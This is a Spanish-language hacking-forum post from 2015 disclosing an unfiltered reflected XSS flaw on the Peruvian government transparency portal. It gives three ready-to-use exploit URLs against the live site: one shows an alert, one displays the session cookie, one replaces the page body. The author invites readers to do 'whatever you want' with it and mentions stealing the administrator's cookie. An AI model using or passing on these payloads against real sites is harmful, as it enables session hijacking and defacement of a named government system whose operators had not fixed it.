Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[XSS] Peru Gob

  • 0 Respuestas
  • 1140 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado v4char

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    0%
  • Reputación 0
  • Let's Learn
    • Ver Perfil
    • Email
  • Skype: v4char
  • Twitter: v4char
« en: Noviembre 19, 2015, 02:13:31 pm »
Hola, hoy traigo un XSS en la web del gobierno de peru la vulnerabilidad ya esta reportada por mi de hace mucho pero como no hacen caso...

Bueno el tema fue que me meti en la web en busca de un fallo asi rapido y encontre un xss en el portal de transparencia solo probe XSS pero estoy seguro que puede tener otros como SQLi aunque yo no he probado ni incito a hacerlo bueno es un XSS muy simple no tiene filtros ni nada a si que permite ejecutar javascript lo que puede permitir a un atacante robar la cookie del administrado del sitio y hacer cosas malas aquí dejo un video subido por mí


y ahora unos pequeños ejemplos de lo que puedes hacer

Alert
Código: [Seleccionar]
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28%22v4char%22%29;%3C/script%3E&id_tema=34


Cookies
Código: [Seleccionar]
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&id_tema=34

Body
Código: [Seleccionar]
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3E%20document.body.innerHTML%20=%20%22%3Ch1%3Ev4char%3C/h1%3E%22;%3C/script%3E&id_tema=34

y asi lo que quieras...

 

¿Te gustó el post? COMPARTILO!